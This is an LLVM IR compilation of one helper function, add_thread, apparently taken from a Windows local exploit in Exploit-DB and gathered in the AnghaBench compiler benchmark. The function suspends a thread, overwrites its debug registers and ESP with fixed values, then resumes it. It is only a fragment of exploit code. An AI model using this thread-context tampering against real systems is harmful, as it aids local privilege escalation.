; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_20880.c_add_thread.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_20880.c_add_thread.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

%struct.TYPE_4__ = type { i32, i32, i64, i64, i64, i32, i32 }

@CONTEXT_DEBUG_REGISTERS = common dso_local global i32 0, align 4
@MAGICESPINLSA = common dso_local global i32 0, align 4

; Function Attrs: noinline nounwind optnone uwtable
define dso_local void @add_thread(i32 %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca %struct.TYPE_4__, align 8
  store i32 %0, i32* %2, align 4
  %4 = bitcast %struct.TYPE_4__* %3 to i8*
  call void @llvm.memset.p0i8.i64(i8* align 8 %4, i8 0, i64 40, i1 false)
  %5 = getelementptr inbounds %struct.TYPE_4__, %struct.TYPE_4__* %3, i32 0, i32 0
  %6 = load i32, i32* @CONTEXT_DEBUG_REGISTERS, align 4
  store i32 %6, i32* %5, align 8
  %7 = load i32, i32* %2, align 4
  %8 = call i32 @SuspendThread(i32 %7)
  %9 = load i32, i32* %2, align 4
  %10 = call i32 @GetThreadContext(i32 %9, %struct.TYPE_4__* %3)
  %11 = getelementptr inbounds %struct.TYPE_4__, %struct.TYPE_4__* %3, i32 0, i32 0
  store i32 -805305024, i32* %11, align 8
  %12 = getelementptr inbounds %struct.TYPE_4__, %struct.TYPE_4__* %3, i32 0, i32 1
  store i32 -61456, i32* %12, align 4
  %13 = load i32, i32* @MAGICESPINLSA, align 4
  %14 = getelementptr inbounds %struct.TYPE_4__, %struct.TYPE_4__* %3, i32 0, i32 5
  store i32 %13, i32* %14, align 8
  %15 = getelementptr inbounds %struct.TYPE_4__, %struct.TYPE_4__* %3, i32 0, i32 4
  store i64 0, i64* %15, align 8
  %16 = getelementptr inbounds %struct.TYPE_4__, %struct.TYPE_4__* %3, i32 0, i32 3
  store i64 0, i64* %16, align 8
  %17 = getelementptr inbounds %struct.TYPE_4__, %struct.TYPE_4__* %3, i32 0, i32 2
  store i64 0, i64* %17, align 8
  %18 = load i32, i32* %2, align 4
  %19 = call i32 @SetThreadContext(i32 %18, %struct.TYPE_4__* %3)
  %20 = load i32, i32* %2, align 4
  %21 = call i32 @ResumeThread(i32 %20)
  ret void
}

; Function Attrs: argmemonly nounwind willreturn
declare void @llvm.memset.p0i8.i64(i8* nocapture writeonly, i8, i64, i1 immarg) #1

declare dso_local i32 @SuspendThread(i32) #2

declare dso_local i32 @GetThreadContext(i32, %struct.TYPE_4__*) #2

declare dso_local i32 @SetThreadContext(i32, %struct.TYPE_4__*) #2

declare dso_local i32 @ResumeThread(i32) #2


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
